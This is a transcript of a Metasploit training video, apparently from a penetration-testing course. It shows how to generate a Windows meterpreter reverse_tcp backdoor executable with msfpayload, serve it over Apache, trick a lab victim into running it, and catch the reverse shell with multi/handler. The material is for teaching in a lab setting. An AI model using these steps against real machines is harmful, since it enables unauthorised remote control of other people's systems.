Hello, welcome to InsectX, Information Security Technologies training on penetration testing with Metasploit. In the last video, we have covered the key differences between MSF payload, MSF venom and MSF encode. In this video, we shall try to create a binary payload. So this binary payload will be created by using the MSF payload. In this scenario, we need to create a backdoor using the MSF payload, and we need to make the victim to run this particular backdoor on his machine. On other hand, attacker will enable the listener for accepting the reverse connection to his machine by using the multi-handler exploit. Whenever the victim opens this particular file, automatically there will be a connection establishment between the attacker machine and the victim machine. And make sure that the machine is not patched, there is no antivirus, and even the firewall is absent. So coming to the attacker machine is the Kali Linux, which is running with the Metasploit framework console, and the victim machine is Windows XP box. So this is the stage 1. Antivirus is absent, updates are absent, and the firewall is also absent. And now these are all the command line augments which I have used for creating the customized backdoor, that is MSF payload and the payload type. Okay, I am going to use meterpreter reverse underscore TCP and the L port, that is 44444, and I am going to save it in my web server, that is in the var www, and after that I will be starting my web server. And on the second side, what I am going to do is I am going to open up the framework console, and I will be using the multi-handler exploit. So in that I will need to supply the same settings which I have given for creation of this particular binary exploit, right? So for that reason I need to supply the same setting, that is a Windows meterpreter reverse underscore TCP and the lhost address and the rport address. Okay, so after successful completion of this stage 1 execution, what we will do is we shall try to change the payload. Okay, we shall keep it to some VNC kind. Let me open up my VMware, and this is my framework console which is running. Now what I will do is I will try to create a exe file, okay, the binary payload. So the step 1, okay, you need to use MSF payload option, MSF payload, and the payload type which we are going to use here, that is Windows meterpreter reverse underscore TCP. Right, and the lhost address, that is the attacker's address, lhost equal to 192.168.159.134, and the L port, that is 5 ports. Okay, 1 2 3 4 5. Okay, and finally we need to save it as an executable one. Let it be www. Let me rename it as hello.exe. The application name is hello.exe. So this particular file is going to be saved in this particular var www. So finally it's been generated. So what the next step here is we need to start our web service issue Apache CTL space start, which will start our web server, and on the other side we need to enable the listener, use exploit multi-handler. Okay, and what are all the payload options which you have supplied here? Okay, example I have used here Windows meterpreter, and I have supplied this particular lhost address, and this is my L port which I have given for creating this particular executable files. Okay, so the same kind of settings should be supplied here. So give it set payload Windows meterpreter reverse underscore TCP, and set the L host, that is the attacker's IP address, 192.168.159.134, and set L port. So what is the L port here? 44444. Okay, 44444, and start exploitation. So as we have discussed, we need to download this particular exe file, right? That is, we need to supply the URL here, 192.168.159.134, and what is the file name? That is hello.exe. Let's save it on the desktop. Click on save. Now open up the folder. Okay, so even before that, you can see here it is listening. Okay, now let me open up this file and see what is going to be happen. You can see here it is sending the stage payload, and we got the interpreter session, right? So that's all for this video. Thanks for watching.